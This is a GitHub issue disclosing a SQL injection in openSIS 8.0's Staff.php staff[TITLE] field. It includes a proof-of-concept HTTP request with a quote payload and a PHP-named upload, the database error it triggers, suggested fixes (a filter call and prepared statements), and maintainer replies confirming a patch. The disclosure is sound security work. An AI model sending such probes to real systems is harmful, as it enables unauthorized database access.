SQL injection in function STAFF.PHP #203

Closed
quanhx11 opened this issue Sep 22, 2021 · 3 comments
Labels
Next Release Fix will be provided with the next release

Comments

@quanhx11

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/users/Staff.php, staff[TITLE] parameter.

POC
REQUEST

POST /Modules.php?modname=users/Staff.php&include=DemographicInfoInc&category_id=1&modfunc=update HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42647140374471146523868129
Content-Length: 132296
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=1
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[TITLE]"

'
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[FIRST_NAME]


-----------------------------42647140374471146523868129	
Content-Disposition: form-data; name="staff[MIDDLE_NAME]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[LAST_NAME]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[NAME_SUFFIX]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ALTERNATE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[GENDER]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="month_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="day_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="year_staff[BIRTHDATE]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[ETHNICITY_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PRIMARY_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[SECOND_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[THIRD_LANGUAGE_ID]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[EMAIL]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[PHYSICAL_DISABILITY]"

N
-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="staff[DISABILITY_DESC]"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="file"; filename="alf\'a.php"
Content-Type: image/png


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="imgblob"


-----------------------------42647140374471146523868129
Content-Disposition: form-data; name="upbtn"

UPLOAD
-----------------------------42647140374471146523868129--

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
		<TD>INSERT INTO staff (CURRENT_SCHOOL_ID,TITLE,PHYSICAL_DISABILITY) values(1,'\''','N')</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Traceback:</b></TD>
			<TD>/var/www/opensis/modules/users/Staff.php at 590</TD>
		</TR>
		</TR><TR>
			<TD align=right><b>Additional Information:</b></TD>
			<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'N')' at line 1</TD>
		</TR>
		</TABLE>
		<TABLE CELLSPACING=10 BORDER=0>
[…]

SOLUTION
Use the function sqlSecurityFilter() before assigning $_REQUEST['staff'] to the $value param.

// Filter the whole staff[] array before any value is used to build the INSERT
$staffs = sqlSecurityFilter($_REQUEST['staff']);
foreach ($staffs as $column => $value) {
    // BIRTHDATE arrives as a free-form date; normalise it to Y-m-d
    if ($column == 'BIRTHDATE' && $value != '') {
        $value = date("Y-m-d", strtotime($value));
    }
    // ... remaining per-column handling continues as before
}
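The failure in the report (a single quote in staff[TITLE] breaking the INSERT at Staff.php line 590) and a fix, as an added example that is not openSIS code or the reporter's code. It swaps in prepared statements with an allow-list of column names instead of the escaping filter suggested above, and assumes PDO with the pdo_sqlite extension as a stand-in for MySQL/MariaDB; the $staff array and the staff table are constructed for the demo.

```php
<?php
// Added example, not openSIS code. Shows the concatenated INSERT that breaks on
// a quote in staff[TITLE], and a parameterised version that does not.
// Assumption: pdo_sqlite is available (stand-in for the MySQL/MariaDB backend).

// Constructed stand-in for $_REQUEST['staff'] with the values sent in the POC.
$staff = ['TITLE' => "'", 'PHYSICAL_DISABILITY' => 'N'];
$currentSchoolId = 1;

// Vulnerable pattern: request values concatenated straight into the SQL text.
function buildInsertUnsafe(int $schoolId, array $staff): string {
    return "INSERT INTO staff (CURRENT_SCHOOL_ID,TITLE,PHYSICAL_DISABILITY) "
         . "values($schoolId,'" . $staff['TITLE'] . "','"
         . $staff['PHYSICAL_DISABILITY'] . "')";
}

// Hardened pattern: column names come from a fixed allow-list (never from the
// request), values are bound as parameters, so quotes in input are just data.
function insertStaffSafe(PDO $db, int $schoolId, array $staff): int {
    $allowed = ['TITLE', 'PHYSICAL_DISABILITY'];   // extend per schema
    $cols = ['CURRENT_SCHOOL_ID'];
    $vals = [$schoolId];
    foreach ($staff as $column => $value) {
        if (!in_array($column, $allowed, true)) {
            continue;                              // drop unknown columns
        }
        $cols[] = $column;
        $vals[] = $value;
    }
    $placeholders = implode(',', array_fill(0, count($vals), '?'));
    $sql = 'INSERT INTO staff (' . implode(',', $cols) . ") VALUES ($placeholders)";
    $stmt = $db->prepare($sql);
    $stmt->execute($vals);
    return (int) $db->lastInsertId();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE staff (STAFF_ID INTEGER PRIMARY KEY, '
        . 'CURRENT_SCHOOL_ID INT, TITLE TEXT, PHYSICAL_DISABILITY TEXT)');

try {
    $db->exec(buildInsertUnsafe($currentSchoolId, $staff)); // unbalanced quote
} catch (PDOException $e) {
    echo "unsafe query failed: " . $e->getMessage() . "\n";
}

$id = insertStaffSafe($db, $currentSchoolId, $staff);
$check = $db->prepare('SELECT TITLE FROM staff WHERE STAFF_ID = ?');
$check->execute([$id]);
echo "safe insert stored TITLE as: " . var_export($check->fetchColumn(), true) . "\n";
```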
@openSISAdmin
Member

Please use the latest code from the repo......not the zip file and try this. We have committed several updates lately.

@sarika0lal
Contributor

Hello,

We appreciate your observation and would like to inform that your suggestion has been implemented for the next release.

Thank you.

@sarika0lal sarika0lal added the Next Release Fix will be provided with the next release label Apr 6, 2022
@sarika0lal
Contributor

We released a new version and the issue has been fixed there. Please check and let us know your feedback in case you have any.
